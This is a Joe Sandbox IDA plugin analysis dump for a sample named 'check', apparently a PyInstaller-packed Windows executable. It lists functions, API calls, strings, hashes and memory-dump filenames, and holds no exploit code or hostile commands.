Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
Instruction ID: 6cbfb8e69ccb3c4f048c9ea494305469ca15fac32a51850809247d7c9295967b
Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
Instruction Fuzzy Hash: F5A0012190CC0AD0E6848F19A8900252224BB74B20B800431F00ED10B1AE3CF4089200

Function 00007FF61E8E76C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF61E8E76D7
GetLastError.KERNEL32 ref: 00007FF61E8E76E9
GetProcAddress.KERNEL32 ref: 00007FF61E8E7725
GetLastError.KERNEL32 ref: 00007FF61E8E7737
GetProcAddress.KERNEL32 ref: 00007FF61E8E7750
GetLastError.KERNEL32 ref: 00007FF61E8E7762
GetProcAddress.KERNEL32 ref: 00007FF61E8E777B
GetLastError.KERNEL32 ref: 00007FF61E8E778D
GetProcAddress.KERNEL32 ref: 00007FF61E8E77A9
GetLastError.KERNEL32 ref: 00007FF61E8E77BB
GetProcAddress.KERNEL32 ref: 00007FF61E8E77D7
GetLastError.KERNEL32 ref: 00007FF61E8E77E9
GetProcAddress.KERNEL32 ref: 00007FF61E8E7805
GetLastError.KERNEL32 ref: 00007FF61E8E7817
GetProcAddress.KERNEL32 ref: 00007FF61E8E7833
GetLastError.KERNEL32 ref: 00007FF61E8E7845
GetProcAddress.KERNEL32 ref: 00007FF61E8E7861
GetLastError.KERNEL32 ref: 00007FF61E8E7873

Strings

Tcl_SetVar2Ex, xrefs: 00007FF61E8E7B37, 00007FF61E8E7B59
Tcl_ConditionNotify, xrefs: 00007FF61E8E796B, 00007FF61E8E798D
Tcl_ConditionWait, xrefs: 00007FF61E8E7999, 00007FF61E8E79BB
Tcl_SetVar2, xrefs: 00007FF61E8E7A51, 00007FF61E8E7A73
Tcl_ThreadAlert, xrefs: 00007FF61E8E79F5, 00007FF61E8E7A17
Tcl_DoOneEvent, xrefs: 00007FF61E8E7771, 00007FF61E8E7793
Tcl_FinalizeThread, xrefs: 00007FF61E8E77CD, 00007FF61E8E77EF
Tk_GetNumMainWindows, xrefs: 00007FF61E8E7CA7, 00007FF61E8E7CC9
Tcl_NewStringObj, xrefs: 00007FF61E8E7ADB, 00007FF61E8E7AFD
GetProcAddress, xrefs: 00007FF61E8E76FF
Tk_Init, xrefs: 00007FF61E8E7C79, 00007FF61E8E7C9B
Tcl_GetString, xrefs: 00007FF61E8E7AAD, 00007FF61E8E7ACF
Tcl_ThreadQueueEvent, xrefs: 00007FF61E8E79C7, 00007FF61E8E79E9
Tcl_GetCurrentThread, xrefs: 00007FF61E8E7857, 00007FF61E8E7879
Tcl_Free, xrefs: 00007FF61E8E7C4B, 00007FF61E8E7C6D
Tcl_EvalObjv, xrefs: 00007FF61E8E7BEF, 00007FF61E8E7C11
Failed to get address for %hs, xrefs: 00007FF61E8E76F8
Tcl_DeleteInterp, xrefs: 00007FF61E8E77FB, 00007FF61E8E781D
Tcl_CreateInterp, xrefs: 00007FF61E8E771B, 00007FF61E8E773D
Tcl_GetObjResult, xrefs: 00007FF61E8E7B65, 00007FF61E8E7B87
Tcl_CreateObjCommand, xrefs: 00007FF61E8E7A7F, 00007FF61E8E7AA1
Tcl_Finalize, xrefs: 00007FF61E8E779F, 00007FF61E8E77C1
Tcl_Init, xrefs: 00007FF61E8E76D0, 00007FF61E8E76EF
Tcl_Alloc, xrefs: 00007FF61E8E7C1D, 00007FF61E8E7C3F
Tcl_EvalEx, xrefs: 00007FF61E8E7BC1, 00007FF61E8E7BE3
Tcl_FindExecutable, xrefs: 00007FF61E8E7746, 00007FF61E8E7768
Tcl_MutexLock, xrefs: 00007FF61E8E78B3, 00007FF61E8E78D5
Tcl_ConditionFinalize, xrefs: 00007FF61E8E793D, 00007FF61E8E795F
Tcl_JoinThread, xrefs: 00007FF61E8E7885, 00007FF61E8E78A7
Tcl_CreateThread, xrefs: 00007FF61E8E7829, 00007FF61E8E784B
Tcl_GetVar2, xrefs: 00007FF61E8E7A23, 00007FF61E8E7A45
Tcl_EvalFile, xrefs: 00007FF61E8E7B93, 00007FF61E8E7BB5
Tcl_MutexUnlock, xrefs: 00007FF61E8E78E1, 00007FF61E8E7903
Tcl_MutexFinalize, xrefs: 00007FF61E8E790F, 00007FF61E8E7931
Tcl_NewByteArrayObj, xrefs: 00007FF61E8E7B09, 00007FF61E8E7B2B

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction ID: 4b8f4dc7cb51a7eb8ca81399835f8973ec7941ea96479027b60f21434e5af6f6
Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction Fuzzy Hash: BC02A87490DF0791FA55AF56A8105B822A9AF34F75F845831F82EC26AAFF3CF5498300

Function 00007FF61E8E81D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF61E8E9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF61E8E45F4,00000000,00007FF61E8E1985), ref: 00007FF61E8E93C9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF61E8E86B7,?,?,00000000,00007FF61E8E3CBB), ref: 00007FF61E8E822C

Part of subcall function 00007FF61E8E2810: MessageBoxW.USER32 ref: 00007FF61E8E28EA

Strings

LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF61E8E82D9
%.*s, xrefs: 00007FF61E8E830C
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF61E8E8373
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF61E8E8240
CreateDirectory, xrefs: 00007FF61E8E837C
\, xrefs: 00007FF61E8E8261
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF61E8E829D
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF61E8E8203

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
Instruction ID: 233f0cb5c566d84db029d1aac6550005b174ae6dfbc0d653846f2d22081f94d6
Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
Instruction Fuzzy Hash: 3E516921A3CE4245FA91DB66D8516BE6354AFB4FA0F444831FA0EC66D6EE7CF5048740

Function 00007FF61E8E2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF61E8E21AB
SelectObject.GDI32 ref: 00007FF61E8E21F2
DrawTextW.USER32 ref: 00007FF61E8E2215
SelectObject.GDI32 ref: 00007FF61E8E222B
ReleaseDC.USER32 ref: 00007FF61E8E223B
MoveWindow.USER32 ref: 00007FF61E8E228B
MoveWindow.USER32 ref: 00007FF61E8E22CB
MoveWindow.USER32 ref: 00007FF61E8E231E
MoveWindow.USER32 ref: 00007FF61E8E2366

Strings

P%, xrefs: 00007FF61E8E21FF

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: 30a501a3fb86ce8cffb685b8ad6a65a00f8566d788088e41f8f16c4ecd30a874
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 7551D736604BA186D6349F26A4181BAB7A1F7A8F71F004125EBDF83795EF3CE145DB10

Function 00007FF61E8E80C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF61E8E80FF
GetWindowLongPtrW.USER32 ref: 00007FF61E8E817F
ShutdownBlockReasonCreate.USER32 ref: 00007FF61E8E8192
GetLastError.KERNEL32 ref: 00007FF61E8E819C
SetWindowLongPtrW.USER32 ref: 00007FF61E8E81B3

Strings

Needs to remove its temporary files., xrefs: 00007FF61E8E8185

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction ID: 414826e90578001c853b22eb860214c9034df1f2e9ee6efff28a0a269a36861f
Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction Fuzzy Hash: CB217631B19E8281E7954F7AA8441796254EFA8FB0F984131FE2EC33D5EE2CF5918201

Function 00007FF61E8F6290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F62D3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F66C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F695C

Strings

p, xrefs: 00007FF61E8F63FD
:, xrefs: 00007FF61E8F648C
p, xrefs: 00007FF61E8F6385
-, xrefs: 00007FF61E8F6369
f, xrefs: 00007FF61E8F63F5

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: c6833b234b7d18a7a990a2109661bd28f48da67bfebdab3662692f2e0777d524
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 3F12B361E1CA4386FBA05A34D15427A7691FB60F78F884335F68A866C4DF3CF590AB81

Function 00007FF61E8F0FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F1008
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F13D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F166F

Strings

f, xrefs: 00007FF61E8F10A0
p, xrefs: 00007FF61E8F10AD
f, xrefs: 00007FF61E8F1255
p, xrefs: 00007FF61E8F1112
f, xrefs: 00007FF61E8F110A

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 3b2ece6f7149fa9a21a3c8a87529f11240214b883a3ba1d8714ea0c9568d5d4b
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: F912B761E1C94386FBA49A54E054679B6E1FBA2F70F844035F69AC7AD6DF3CF4808B00

Function 00007FF61E8E1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF61E8E10CC
fseek, xrefs: 00007FF61E8E10D3
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF61E8E11F6
malloc, xrefs: 00007FF61E8E110F
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF61E8E1108
fread, xrefs: 00007FF61E8E11FD
Failed to extract %s: failed to open archive file!, xrefs: 00007FF61E8E1098

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 4766fd9fea8e38f8ef7433baa84d7eef3373f3bc35dc64b3497eb8d81a71ab88
Instruction ID: aa35d5235ee3103b7101541011e6953add6bc01bd36e8f2d0ebaeae92fd0e8fc
Opcode Fuzzy Hash: 4766fd9fea8e38f8ef7433baa84d7eef3373f3bc35dc64b3497eb8d81a71ab88
Instruction Fuzzy Hash: 7B417C21B18E5286EA90EB16A8006FA6395FF64FE4F845832FD4DC7796DE3CF9018740

Function 00007FF61E8E1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF61E8E14DE
fseek, xrefs: 00007FF61E8E14E5
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF61E8E15DF
malloc, xrefs: 00007FF61E8E151F
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF61E8E1518
fread, xrefs: 00007FF61E8E15E6
Failed to extract %s: failed to open archive file!, xrefs: 00007FF61E8E149F

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: c4a15b4578328202095984dbee273c4da1e986305321664890ae0d16d35fced4
Instruction ID: c8c98ee30bd090d288c7bacff53c8ac1db076e7f6115988ebde9881df91c1fbb
Opcode Fuzzy Hash: c4a15b4578328202095984dbee273c4da1e986305321664890ae0d16d35fced4
Instruction Fuzzy Hash: 01414D31A18E429AEA50DF6294405F96390EF64FA4F844932FD5EC7B96EE3CF5428704

Function 00007FF61E8EEA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF61E8EEA65

Part of subcall function 00007FF61E8EF9BC: __GetUnwindTryBlock.LIBCMT ref: 00007FF61E8EF9FF
Part of subcall function 00007FF61E8EF9BC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF61E8EFA24

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF61E8EEB3D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF61E8EED8B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF61E8EEE98

Strings

csm, xrefs: 00007FF61E8EEA7F
csm, xrefs: 00007FF61E8EEB60
csm, xrefs: 00007FF61E8EEAE6

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction ID: e357f4f2ac3da671c06218818001ac4f264300076b562059fefa86fed44b5ff9
Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction Fuzzy Hash: 18D16F22A08F4686EBA09F66D4403AD77A0FB65BA8F100135FE8D97B95DF38F494C700

Function 00007FF61E8E2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF61E8E3706,?,00007FF61E8E3804), ref: 00007FF61E8E2C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF61E8E3706,?,00007FF61E8E3804), ref: 00007FF61E8E2D63
MessageBoxW.USER32 ref: 00007FF61E8E2D99

Strings

%ls: , xrefs: 00007FF61E8E2D22
Error, xrefs: 00007FF61E8E2D8C
<FormatMessageW failed.>, xrefs: 00007FF61E8E2D70
[PYI-%d:ERROR] , xrefs: 00007FF61E8E2CA6

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction ID: fa2e99122a8e50dbcb897a0e844c4f7bff56a3a43d4623eaf2c89b8f6438e1cc
Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction Fuzzy Hash: 6031D832B08F5146E660AB26A8102AA6695BF94FA8F410135FF4ED3759EF3CE506C300

Function 00007FF61E8EDCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF61E8EDF7A,?,?,?,00007FF61E8EDC6C,?,?,?,00007FF61E8ED869), ref: 00007FF61E8EDD4D
GetLastError.KERNEL32(?,?,?,00007FF61E8EDF7A,?,?,?,00007FF61E8EDC6C,?,?,?,00007FF61E8ED869), ref: 00007FF61E8EDD5B
LoadLibraryExW.KERNEL32(?,?,?,00007FF61E8EDF7A,?,?,?,00007FF61E8EDC6C,?,?,?,00007FF61E8ED869), ref: 00007FF61E8EDD85
FreeLibrary.KERNEL32(?,?,?,00007FF61E8EDF7A,?,?,?,00007FF61E8EDC6C,?,?,?,00007FF61E8ED869), ref: 00007FF61E8EDDF3
GetProcAddress.KERNEL32(?,?,?,00007FF61E8EDF7A,?,?,?,00007FF61E8EDC6C,?,?,?,00007FF61E8ED869), ref: 00007FF61E8EDDFF

Strings

api-ms-, xrefs: 00007FF61E8EDD6D

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction ID: 428c87f2d6f4963c35cb62adf3cd5f56d20136996b99c06561556554273a86b5
Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction Fuzzy Hash: 5E31A321B1AE4292EE929F1B94005B523A8FF68FB4F594935FD1D863C5EF3CF4498200

Function 00007FF61E8E6360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF61E8E6407
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF61E8E63C7
Failed to load Python DLL '%ls'., xrefs: 00007FF61E8E64A7
ucrtbase.dll, xrefs: 00007FF61E8E63DD
LoadLibrary, xrefs: 00007FF61E8E64AE
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF61E8E6456

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: bd35b640c02035bc0e077a05b147b005ab0e639f37cafda848bc65a29b3ec2f1
